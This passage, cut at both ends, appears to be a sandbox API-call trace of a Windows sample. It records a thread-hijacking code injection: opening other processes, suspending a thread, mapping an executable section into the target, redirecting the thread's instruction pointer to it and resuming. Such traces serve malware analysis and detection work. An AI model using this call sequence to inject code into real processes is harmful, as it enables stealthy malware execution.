SecurityQualityOfService=0x0), ClientId=0x19ea54*(UniqueProcess=0xbe4, UniqueThread=0x0) | out: ProcessHandle=0x19ea74*=0x100) returned 0x0 [0158.845] NtQueryInformationProcess (in: ProcessHandle=0x100, ProcessInformationClass=0x1a, ProcessInformation=0x19ea64, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19ea64, ReturnLength=0x0) returned 0x0 [0158.845] NtQueryInformationProcess (in: ProcessHandle=0x100, ProcessInformationClass=0x0, ProcessInformation=0x19e6e8, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x19e6e8, ReturnLength=0x0) returned 0x0 [0158.845] NtReadVirtualMemory (in: ProcessHandle=0x100, BaseAddress=0x7efde000, Buffer=0x19e9fc, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0x19e9fc*, NumberOfBytesRead=0x0) returned 0x0 [0158.845] NtDelayExecution (Alertable=0, Interval=0x19e6d0*=-50000000) returned 0x0 [0158.858] NtOpenThread (in: ThreadHandle=0x19ea68, DesiredAccess=0x1a, ObjectAttributes=0x19e6b4, ClientId=0x19e6cc*(UniqueProcess=0x0, UniqueThread=0xbe8) | out: ThreadHandle=0x19ea68*=0x104) returned 0x0 [0158.858] NtSuspendThread (in: ThreadHandle=0x104, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0158.859] NtMapViewOfSection (in: SectionHandle=0xec, ProcessHandle=0x100, BaseAddress=0x19e708*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19e708*=0x1ee0000, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000) returned 0x0 [0158.870] NtGetContextThread (in: ThreadHandle=0x104, Context=0x19e730 | out: Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x34fe00, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x34fda8, Eip=0x766e78d7, SegCs=0x23, EFlags=0x246, Esp=0x34fd8c, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0158.870] NtCreateSection (in: SectionHandle=0x19e6f0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19e6b0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19e6f0*=0x108) returned 0x0 [0158.871] NtMapViewOfSection (in: SectionHandle=0x108, ProcessHandle=0xffffffff, BaseAddress=0x19e6f8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6b0*=0xe7200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f8*=0xb50000, SectionOffset=0x0, ViewSize=0x19e6b0*=0xe8000) returned 0x0 [0158.875] NtMapViewOfSection (in: SectionHandle=0x108, ProcessHandle=0x100, BaseAddress=0x19e6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6ec*=0xe7200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f4*=0x28b0000, SectionOffset=0x0, ViewSize=0x19e6ec*=0xe8000) returned 0x0 [0158.887] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0xb50000) returned 0x0 [0158.896] NtClose (Handle=0x108) returned 0x0 [0158.896] NtSetContextThread (ThreadHandle=0x104, Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x34fe00, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x34fda8, Eip=0x2904707, SegCs=0x23, EFlags=0x246, Esp=0x34fd8c, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0158.896] NtResumeThread (in: ThreadHandle=0x104, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0158.896] NtClose (Handle=0x100) returned 0x0 [0158.896] NtClose (Handle=0x104) returned 0x0 [0158.897] NtOpenProcess (in: ProcessHandle=0x19ea74, DesiredAccess=0x438, ObjectAttributes=0x19ea3c*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19ea54*(UniqueProcess=0xbec, UniqueThread=0x0) | out: ProcessHandle=0x19ea74*=0x104) returned 0x0 [0158.897] NtQueryInformationProcess (in: ProcessHandle=0x104, ProcessInformationClass=0x1a, ProcessInformation=0x19ea64, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19ea64, ReturnLength=0x0) returned 0x0 [0158.897] NtQueryInformationProcess (in: ProcessHandle=0x104, ProcessInformationClass=0x0, ProcessInformation=0x19e6e8, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x19e6e8, ReturnLength=0x0) returned 0x0 [0158.897] NtReadVirtualMemory (in: ProcessHandle=0x104, BaseAddress=0x7efde000, Buffer=0x19e9fc, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0x19e9fc*, NumberOfBytesRead=0x0) returned 0x0 [0158.897] NtDelayExecution (Alertable=0, Interval=0x19e6d0*=-50000000) returned 0x0 [0158.905] NtOpenThread (in: ThreadHandle=0x19ea68, DesiredAccess=0x1a, ObjectAttributes=0x19e6b4, ClientId=0x19e6cc*(UniqueProcess=0x0, UniqueThread=0xbf0) | out: ThreadHandle=0x19ea68*=0x100) returned 0x0 [0158.905] NtSuspendThread (in: ThreadHandle=0x100, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0158.906] NtMapViewOfSection (in: SectionHandle=0xec, ProcessHandle=0x104, BaseAddress=0x19e708*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19e708*=0x2620000, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000) returned 0x0 [0158.914] NtGetContextThread (in: ThreadHandle=0x100, Context=0x19e730 | out: Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x32f828, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x32f7d0, Eip=0x766e78d7, SegCs=0x23, EFlags=0x246, Esp=0x32f7b4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, 